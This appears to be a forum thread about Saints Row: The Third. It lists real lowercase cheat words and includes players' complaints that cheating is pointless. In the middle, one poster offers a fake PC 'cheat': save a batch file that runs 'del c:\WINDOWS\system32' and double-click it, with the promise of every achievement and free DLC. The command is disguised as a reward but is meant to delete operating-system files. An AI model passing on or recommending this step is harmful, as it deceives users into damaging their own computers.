All cheat words are all in lowercase.

cheese - Give $110,000
runfast - Infinite Sprint
whatitmeanstome - Gives Respect
pissoffpigs - Add Police Notoriety
lolz - Add Gang Notoriety
goodygoody - Remove Cop Notoriety
oops - Remove Gang Notoriety

You should see the Xbox live community. Almost everyone's a cheater and almost no one has all the viewer packs.

 As for cheat codes, I have a real neat one for you:

For console: Press eject button on your console, violently crush the disk. Effect: You stop getting mocked by everyone for using cheats.

For PC: Exit the game, open up a fresh, new wordpad document, enter this:

"@echo off

del c:\WINDOWS\system32"

(Without quotes), save it as cheat.bat(Save it as all files), put it inside you SR3 directory, then double click the bat file.

Effect:All achievements, instant 100%, infinite everything, All non-obtainable vehicles and clothes, no censor, secret dev outfits+weapons, all DLC for free, gangsta's in space guns and superpowers.

Having all people on the street turned into drunk mascots can be kinda fun at times.

Still, most people only use cheats to get weapons THEY WOULD GET ANYWAY BY PLAYING THE GAME. Makes the whole thing very pointless, if you ask me. I got all weapons and vehicles from the game you can get with the exception of the Specter and that thing I got covered with the Interceptor from the Moneyshot Pack. So, I don't miss anything important (no, Killbanes mask is NOT important for me) and never have used cheats at any point.
